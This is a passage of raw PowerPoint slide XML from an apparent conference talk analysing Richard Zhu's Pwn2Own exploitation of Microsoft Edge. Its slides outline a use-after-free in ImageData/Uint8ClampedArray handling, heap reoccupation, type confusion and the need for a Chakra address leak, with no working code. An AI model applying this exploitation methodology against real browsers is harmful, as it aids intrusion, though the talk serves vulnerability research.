              <a:t>, we can successfully occupy a segment of an integer array on the dynamic object position to be processed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>But to achieve type confusion successfully, we need to pass object type checking and subsequent object operations (such as virtual function calls).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Both of these require the Chakra module base address, a vulnerability in information disclosure. Obviously, the vulnerability analyzed above does not have the ability to leak information.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3616011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Background Knowledge</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A012BFE-BBEE-475E-B655-0F2ED52ED908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="10953455" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As mentioned in Pwn2Own's report twitter, Richard Zhu breaks Edge through two UAF vulnerabilities and one kernel vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94533C7-E6CD-4DE7-9D57-7AF2A1D30BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1098066" y="4264340"/>
            <a:ext cx="10933514" cy="3530426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="916700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Background Knowledge</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F79A751-5E50-454F-A06B-53B946C2A13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="10953455" cy="7977662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2929208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Background Knowledge</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C78A85-EF8D-404A-A8CA-01262DECD9D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="6448424" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{281AB5A6-8398-4783-8B14-627C85C499EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015786" y="4145345"/>
            <a:ext cx="6448424" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Constructor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6363A2D8-4F71-4E1E-9908-5C26B0CE0F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015786" y="5832943"/>
            <a:ext cx="6448424" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uint8ClampedArray</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED71D859-1693-43C6-8FE7-222C57AAABC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="2991162"/>
            <a:ext cx="5377793" cy="1247129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F19DB9-EAE0-4F2B-9312-6B70F4932720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="4558996"/>
            <a:ext cx="5377793" cy="1106122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC623E3-D5F8-4C78-AFDF-19C59B689003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102185" y="6361102"/>
            <a:ext cx="5420463" cy="1106067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{855F345E-EC73-408D-9DF1-47D8B3CFB3FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6554852" y="2991162"/>
            <a:ext cx="5467917" cy="4147057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1717494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Vulnerability Analysis</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形: 圆角 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F674BC-913A-4C26-9504-C2CE819EB039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970468" y="2812054"/>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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uint8ClampedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直接箭头连接符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FDDAD7E-C945-41B9-83AC-5FB796AA8C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787258" y="3701054"/>
            <a:ext cx="0" cy="81336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12" name="矩形: 圆角 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A73ABA-23B9-4022-8052-3CD17A937DDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970468" y="4514417"/>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rPr>
              <a:t>InitializeFromUint8ClampedArray</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形: 圆角 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF7384A7-53AF-475B-B987-7BD1ACFD57F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5161107" y="4514417"/>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rPr>
              <a:t>Uint8ClampedArray.buffer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="直接箭头连接符 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC38F1B7-7B10-4221-BA3D-2A71E448A21B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604048" y="4958917"/>
            <a:ext cx="557059"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1" name="矩形: 圆角 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95214D95-AE0D-4693-B4B4-F50264319F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5161107" y="2812054"/>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rPr>
              <a:t>CanvasImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接箭头连接符 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F47BE225-5328-4BFE-999C-81701B239494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604048" y="3256554"/>
            <a:ext cx="557059"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9" name="直接箭头连接符 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{522D7C31-7559-4637-9EE6-92A322BAE4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6977897" y="3701054"/>
            <a:ext cx="0" cy="813363"/>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32" name="矩形: 圆角 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87EDE6F6-0C35-406A-99B5-DA4A37C69EB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970468" y="6216779"/>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rPr>
              <a:t>Free&amp;GC&amp;AllocateObject</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="连接符: 肘形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF6732EF-0710-4F27-B353-224731E31998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="3"/>
            <a:endCxn id="16" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4604048" y="4958917"/>
            <a:ext cx="4190639" cy="1702362"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 105455"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="矩形: 圆角 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5EA6B9-B647-43AE-861A-A414B91F581D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5161107" y="4514417"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ocupy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="矩形: 圆角 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C03D5545-FC69-45FA-81F3-A38DF9345E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970468" y="8003570"/>
            <a:ext cx="363358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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Related read function</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="连接符: 肘形 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1569CF1D-2334-4237-ABB4-F08260E1FA94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="3"/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4604048" y="3256554"/>
            <a:ext cx="4190639" cy="5191516"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 128487"/>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文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E22A83A0-337F-458C-9948-7D35C086866C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139515" y="2291178"/>
            <a:ext cx="2160479" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Constructor</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
